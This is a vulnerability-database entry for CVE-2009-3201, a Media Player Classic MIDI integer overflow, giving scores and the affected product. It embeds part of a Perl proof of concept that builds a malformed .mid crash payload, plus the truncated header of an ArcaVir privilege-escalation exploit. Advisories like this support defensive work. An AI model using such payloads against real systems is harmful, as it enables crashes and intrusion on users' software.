CVE-2009-3201
published 2009-09-15CVE-2009-3201: Integer overflow in Media Player Classic 6.4.9 allows user-assisted remote attackers to cause a denial of service (application crash) via a MIDI file (.mid)…
PriorityP415medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
1.92%
77.3th percentile
Integer overflow in Media Player Classic 6.4.9 allows user-assisted remote attackers to cause a denial of service (application crash) via a MIDI file (.mid) with a malformed header, which triggers a buffer overflow, a different vulnerability than CVE-2007-4940.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rob_schultz | media_player_classic | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)
exploitdb·2009-09-09
CVE-2009-3201 Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)
Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)
---
#!/usr/bin/perl
print qq(
############################################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Media Player Classic 6.4.9(.mid) Integer Overflow PoC ##
## Vulnerability Discovered By : PLATEN ##
## E-mail && blog: ##
## hjafari.blogspot.com ##
## platen.secure[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
############################################################
);
$boom = "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01
Exploit-DB
ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Local Privilege Escalation
exploitdb·2009-05-26
CVE-2009-1824 ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Local Privilege Escalation
ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Local Privilege Escalation
---
////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// | | //
// | ArcaBit Sp. z o.o. - http://www.arcabit.com/ | //
// | | //
// | Affected Software: | //
// | ArcaVir 2009 Antivirus Protection <= 9.4.3201.9 | //
// | ArcaVir 2009 Internet Security <= 9.4.3202.9 | //
// | ArcaVir 2009 System Protection <= 9.4.3203.9 | //
// | ArcaVir 2009 Home Protection <= 9.4.3204.9 | //
// | | //
// | Affected Driver: | //
// | ps_drv.sys | //
// | | //
// | Local Privilege Escalation Exploit | //
// | For Educational Purposes Only ! | //
// | | //
// +--------------------------------------------------------------
No writeups or analysis indexed.
2009-09-15
Published